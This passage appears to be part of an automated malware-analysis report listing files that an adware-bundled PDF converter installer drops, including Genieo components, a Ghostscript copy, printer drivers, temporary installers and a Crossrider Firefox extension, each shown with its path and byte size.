      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\redArrow.png (262 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\sad.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\play_icon.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture_.png (976 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\play_big.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tools.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\trash.png (515 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\template_factory.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_down.png (703 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\miniview.css (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\mobile.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Renderers.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\defaultPicture.png (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2sm.png (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bigHotItemIcon.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1sm.jpg (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3.jpg (3312 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\coverShadow.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\bigHotItemIcon.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar.gif (101 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twit_pic.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray.png (193 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pink.gif (801 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\topicDefault.gif (565 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\birthday.html (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_x.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_left.png (256 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\tpl\main.tpl (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.postmessage.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2sm.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds.png (763 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white_down.png (191 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\lowLevel.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\okCancelButton.png (734 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dfImg.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dot_clear.gif (42 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\genieo_is_installed.js (37 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\bday_image.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie9.css (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.settings\org.eclipse.core.resources.prefs (124 bytes)
      C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)
      %Program Files% (x86)\GPLGS\traceop.ps (2 bytes)
      %Program Files% (x86)\GPLGS\fonts.dir (27 bytes)
      %Program Files% (x86)\GPLGS\zeroline.ps (2 bytes)
      %Program Files% (x86)\GPLGS\viewcmyk.ps (2 bytes)
      %Program Files% (x86)\GPLGS\quit.ps (6 bytes)
      %Program Files% (x86)\GPLGS\pv.sh (1 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.Ult (6 bytes)
      %Program Files% (x86)\GPLGS\markhint.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_fonts.ps (45 bytes)
      %Program Files% (x86)\GPLGS\z003034l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_il1_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\n021004l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_diskf.ps (7 bytes)
      %Program Files% (x86)\GPLGS\gs_wl2_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_wan_e.ps (1 bytes)
      %Program Files% (x86)\GPLGS\fonts.scale (27 bytes)
      %Program Files% (x86)\GPLGS\viewps2a.ps (1 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.VMS (14 bytes)
      %Program Files% (x86)\GPLGS\gsnup.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_stres.ps (4 bytes)
      %Program Files% (x86)\GPLGS\p052024l.pfb (673 bytes)
      %Program Files% (x86)\GPLGS\gs_t.xbm (353 bytes)
      %Program Files% (x86)\GPLGS\gs_pdf_e.ps (1 bytes)
      %Program Files% (x86)\GPLGS\acctest.ps (4 bytes)
      %Program Files% (x86)\GPLGS\b018032l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_mgl_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\pdf_draw.ps (41 bytes)
      %Program Files% (x86)\GPLGS\pdf_font.ps (43 bytes)
      %Program Files% (x86)\GPLGS\viewpcx.ps (4 bytes)
      %Program Files% (x86)\GPLGS\n022003l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_sepr.ps (8 bytes)
      %Program Files% (x86)\GPLGS\gs_typ32.ps (4 bytes)
      %Program Files% (x86)\GPLGS\gs_lev2.ps (31 bytes)
      %Program Files% (x86)\GPLGS\c059013l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\b018012l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gswin32c.exe (601 bytes)
      %Program Files% (x86)\GPLGS\gs_type1.ps (7 bytes)
      %Program Files% (x86)\GPLGS\type1enc.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_ce_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_lgo_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\addxchar.ps (10 bytes)
      %Program Files% (x86)\GPLGS\gs_frsd.ps (3 bytes)
      %Program Files% (x86)\GPLGS\rollconv.ps (12 bytes)
      %Program Files% (x86)\GPLGS\gs_cff.ps (22 bytes)
      %Program Files% (x86)\GPLGS\Info-macos.plist (483 bytes)
      %Program Files% (x86)\GPLGS\gs_wl1_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_css_e.ps (5 bytes)
      %Program Files% (x86)\GPLGS\gs_ksb_e.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_l.xbm (1 bytes)
      %Program Files% (x86)\GPLGS\ht_ccsto.ps (1281 bytes)
      %Program Files% (x86)\GPLGS\gs_il2_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_t_m.xbm (363 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.Sol (16 bytes)
      %Program Files% (x86)\GPLGS\uninfo.ps (6 bytes)
      %Program Files% (x86)\GPLGS\pdf_rbld.ps (13 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.OSF (6 bytes)
      %Program Files% (x86)\GPLGS\gs_devcs.ps (6 bytes)
      %Program Files% (x86)\GPLGS\decrypt.ps (369 bytes)
      %Program Files% (x86)\GPLGS\gs_dps2.ps (7 bytes)
      %Program Files% (x86)\GPLGS\p052023l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_ttf.ps (43 bytes)
      %Program Files% (x86)\GPLGS\pdf_ops.ps (21 bytes)
      %Program Files% (x86)\GPLGS\viewjpeg.ps (5 bytes)
      %Program Files% (x86)\GPLGS\pdfopt.ps (37 bytes)
      %Program Files% (x86)\GPLGS\pdf_sec.ps (10 bytes)
      %Program Files% (x86)\GPLGS\type1ops.ps (7 bytes)
      %Program Files% (x86)\GPLGS\printafm.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_btokn.ps (11 bytes)
      %Program Files% (x86)\GPLGS\a010035l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\n022004l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_dscp.ps (4 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.GS (13 bytes)
      %Program Files% (x86)\GPLGS\gsdll32.dll (19686 bytes)
      %Program Files% (x86)\GPLGS\gs_l.xpm (2 bytes)
      %Program Files% (x86)\GPLGS\gs_cspace.ps (30 bytes)
      %Program Files% (x86)\GPLGS\showpage.ps (10 bytes)
      %Program Files% (x86)\GPLGS\gs_std_e.ps (3 bytes)
      %Program Files% (x86)\GPLGS\wftopfa.ps (9 bytes)
      %Program Files% (x86)\GPLGS\stcolor.ps (5 bytes)
      %Program Files% (x86)\GPLGS\pf2afm.ps (15 bytes)
      %Program Files% (x86)\GPLGS\gs_statd.ps (13 bytes)
      %Program Files% (x86)\GPLGS\gs_typ42.ps (1 bytes)
      %Program Files% (x86)\GPLGS\docie.ps (7 bytes)
      %Program Files% (x86)\GPLGS\gs_cmdl.ps (5 bytes)
      %Program Files% (x86)\GPLGS\prfont.ps (6 bytes)
      %Program Files% (x86)\GPLGS\gs_sym_e.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_s_m.xbm (615 bytes)
      %Program Files% (x86)\GPLGS\caption.ps (1 bytes)
      %Program Files% (x86)\GPLGS\gs_cidfm.ps (4 bytes)
      %Program Files% (x86)\GPLGS\pphs (220 bytes)
      %Program Files% (x86)\GPLGS\gs_icc.ps (10 bytes)
      %Program Files% (x86)\GPLGS\gs_epsf.ps (7 bytes)
      %Program Files% (x86)\GPLGS\gs_ciecs2.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_devn.ps (5 bytes)
      %Program Files% (x86)\GPLGS\gs_dps.ps (8 bytes)
      %Program Files% (x86)\GPLGS\n019024l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\level1.ps (117 bytes)
      %Program Files% (x86)\GPLGS\gs_resst.ps (5 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.OS2 (7 bytes)
      %Program Files% (x86)\GPLGS\c059033l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_rdlin.ps (886 bytes)
      %Program Files% (x86)\GPLGS\gs_dpnxt.ps (4 bytes)
      %Program Files% (x86)\GPLGS\cid2code.ps (4 bytes)
      %Program Files% (x86)\GPLGS\n021023l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_ciddc.ps (7 bytes)
      %Program Files% (x86)\GPLGS\gs_init.ps (601 bytes)
      %Program Files% (x86)\GPLGS\gs_cidtt.ps (4 bytes)
      %Program Files% (x86)\GPLGS\gs_img.ps (22 bytes)
      %Program Files% (x86)\GPLGS\gs_pfile.ps (4 bytes)
      %Program Files% (x86)\GPLGS\c059036l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\c059016l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_m_m.xbm (971 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.ATM (5 bytes)
      %Program Files% (x86)\GPLGS\markpath.ps (1 bytes)
      %Program Files% (x86)\GPLGS\gs_devpxl.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_cidcm.ps (16 bytes)
      %Program Files% (x86)\GPLGS\gs_diskn.ps (7 bytes)
      %Program Files% (x86)\GPLGS\n019044l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\n022024l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_cmap.ps (17 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.ATB (6 bytes)
      %Program Files% (x86)\GPLGS\pdf2dsc.ps (5 bytes)
      %Program Files% (x86)\GPLGS\pphs.ps (7 bytes)
      %Program Files% (x86)\GPLGS\unprot.ps (1 bytes)
      %Program Files% (x86)\GPLGS\gs_fform.ps (3 bytes)
      %Program Files% (x86)\GPLGS\landscap.ps (1 bytes)
      %Program Files% (x86)\GPLGS\wrfont.ps (18 bytes)
      %Program Files% (x86)\GPLGS\lines.ps (4 bytes)
      %Program Files% (x86)\GPLGS\gs_cidfn.ps (13 bytes)
      %Program Files% (x86)\GPLGS\gs_mex_e.ps (4 bytes)
      %Program Files% (x86)\GPLGS\gs_lgx_e.ps (1 bytes)
      %Program Files% (x86)\GPLGS\traceimg.ps (1 bytes)
      %Program Files% (x86)\GPLGS\gs_l2img.ps (5 bytes)
      %Program Files% (x86)\GPLGS\gs_ccfnt.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_kanji.ps (4 bytes)
      %Program Files% (x86)\GPLGS\a010033l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_l_m.xbm (1 bytes)
      %Program Files% (x86)\GPLGS\a010015l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\pfbtopfa.ps (1 bytes)
      %Program Files% (x86)\GPLGS\b018015l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\n019064l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\Fontmap.SGI (14 bytes)
      %Program Files% (x86)\GPLGS\ppath.ps (2 bytes)
      %Program Files% (x86)\GPLGS\viewpbm.ps (5 bytes)
      %Program Files% (x86)\GPLGS\gs_res.ps (35 bytes)
      %Program Files% (x86)\GPLGS\gs_s.xbm (605 bytes)
      %Program Files% (x86)\GPLGS\n019004l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_m.xpm (1 bytes)
      %Program Files% (x86)\GPLGS\gs_m.xbm (961 bytes)
      %Program Files% (x86)\GPLGS\s050000l.pfb (33 bytes)
      %Program Files% (x86)\GPLGS\p052004l.pfb (673 bytes)
      %Program Files% (x86)\GPLGS\font2c.ps (20 bytes)
      %Program Files% (x86)\GPLGS\stcinfo.ps (26 bytes)
      %Program Files% (x86)\GPLGS\gs_t.xpm (633 bytes)
      %Program Files% (x86)\GPLGS\gslp.ps (20 bytes)
      %Program Files% (x86)\GPLGS\pcharstr.ps (3 bytes)
      %Program Files% (x86)\GPLGS\gs_dbt_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_patrn.ps (8 bytes)
      %Program Files% (x86)\GPLGS\xlatmap (1 bytes)
      %Program Files% (x86)\GPLGS\n019023l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\ps2ai.ps (23 bytes)
      %Program Files% (x86)\GPLGS\gs_indxd.ps (5 bytes)
      %Program Files% (x86)\GPLGS\gs_trap.ps (3 bytes)
      %Program Files% (x86)\GPLGS\errpage.ps (8 bytes)
      %Program Files% (x86)\GPLGS\n019003l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\stocht.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_mro_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\bdftops.ps (24 bytes)
      %Program Files% (x86)\GPLGS\winmaps.ps (3 bytes)
      %Program Files% (x86)\GPLGS\viewgif.ps (4 bytes)
      %Program Files% (x86)\GPLGS\pdf_base.ps (25 bytes)
      %Program Files% (x86)\GPLGS\gs_s.xpm (993 bytes)
      %Program Files% (x86)\GPLGS\pdf_main.ps (35 bytes)
      %Program Files% (x86)\GPLGS\gs_dps1.ps (4 bytes)
      %Program Files% (x86)\GPLGS\n022023l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\n021003l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\d050000l.pfb (45 bytes)
      %Program Files% (x86)\GPLGS\gs_wl5_e.ps (2 bytes)
      %Program Files% (x86)\GPLGS\gs_agl.ps (29 bytes)
      %Program Files% (x86)\GPLGS\impath.ps (5 bytes)
      %Program Files% (x86)\GPLGS\pdfwrite.ps (10 bytes)
      %Program Files% (x86)\GPLGS\COPYING (17 bytes)
      %Program Files% (x86)\GPLGS\gs_pdfwr.ps (21 bytes)
      %Program Files% (x86)\GPLGS\a010013l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\jispaper.ps (961 bytes)
      %Program Files% (x86)\GPLGS\showchar.ps (3 bytes)
      %Program Files% (x86)\GPLGS\font2pcl.ps (18 bytes)
      %Program Files% (x86)\GPLGS\viewmiff.ps (3 bytes)
      %Program Files% (x86)\GPLGS\n021024l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_resmp.ps (21 bytes)
      %Program Files% (x86)\GPLGS\n019043l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\align.ps (2 bytes)
      %Program Files% (x86)\GPLGS\p052003l.pfb (673 bytes)
      %Program Files% (x86)\GPLGS\gs_setpd.ps (28 bytes)
      %Program Files% (x86)\GPLGS\b018035l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_ll3.ps (10 bytes)
      %Program Files% (x86)\GPLGS\image-qa.ps (601 bytes)
      %Program Files% (x86)\GPLGS\gs_fapi.ps (9 bytes)
      %Program Files% (x86)\GPLGS\n019063l.pfb (601 bytes)
      %Program Files% (x86)\GPLGS\gs_fntem.ps (11 bytes)
      %Program Files% (x86)\GPLGS\gs_ciecs3.ps (3 bytes)
      %Program Files% (x86)\GPLGS\packfile.ps (10 bytes)
      %Program Files% (x86)\MyPDFConverter\setup.inf (312 bytes)
      C:\Windows\System32\spool\drivers\x64\PSCRIPT5.DLL (4185 bytes)
      %Program Files% (x86)\MyPDFConverter\README.HTM (4 bytes)
      C:\Windows\System32\spool\drivers\x64\PSCRIPT.HLP (26 bytes)
      C:\Windows\System32\spool\drivers\x64\CUSTPDFW.PPD (31 bytes)
      %Program Files% (x86)\MyPDFConverter\setup\unInstpw64.exe (24 bytes)
      %Program Files% (x86)\MyPDFConverter\PDFWrite.rsp (116 bytes)
      C:\Windows\System32\spool\drivers\x64\PS5UI.DLL (5873 bytes)
      %Program Files% (x86)\MyPDFConverter\CPWriter2.exe (601 bytes)
      %Program Files% (x86)\MyPDFConverter\unInstpw64.exe (23 bytes)
      %Program Files% (x86)\MyPDFConverter\Preferences.exe (24 bytes)
      %Program Files% (x86)\MyPDFConverter\setup\Converter.exe (678 bytes)
      C:\Windows\System32\spool\drivers\x64\PSCRIPT.NTF (7433 bytes)
      %Program Files% (x86)\MyPDFConverter\pdfwriter.exe (43 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\StdUtils.dll (30 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\System.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Qzcggrhivnxb.tmp (455919 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\Vlwgfsqfpaz.exe (1749665 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1058.bat (411 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2405.tmp\FacebookIsGod.dll (2552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_d (167333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_e (167333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_b (167333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_c (167333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a (167333 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[1].htm (1056 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.2 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (1156 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.1 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\eula[2].htm (1056 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\mydpfconv icon[1].png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.4 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.5 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.1 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.0 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.3 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.2 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.5 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.4 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.7 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp.6 (5224 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyo_sprite_full[1].png (1300 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5P76D326.txt (97 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-mystartsearch[1].htm (1871 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.3 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.0 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\4b5cb7aab8d80a4ba5daaec3cbcf46f0[1].htm (43893 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.6 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.7 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe.1 (9352 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.7 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.6 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.5 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.4 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.3 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.2 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\eula-sourceapp[1].htm (4319 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe.0 (2696 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8CO6P6LD.txt (94 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp (79808 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\tokyoThreeWavesBG[1].jpg (200 bytes)
      C:\Windows\System32\custmon64.dll (601 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\221.js (419 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\234.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\288.js (557 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\dbe88a314f000d3b15042465fdf21cc5.js (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c422d0a33c0be34d39a93687c738b5f0.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\255.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon24.png (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button1.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\7df47bd2f0a36fc56fb4d5f85d879331.js (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\2edcf1d6343b69377b1b5ab704fc0dba.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\ab9e8724735655aca91d2a7b089e2a0b.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\install.rdf (5 bytes)
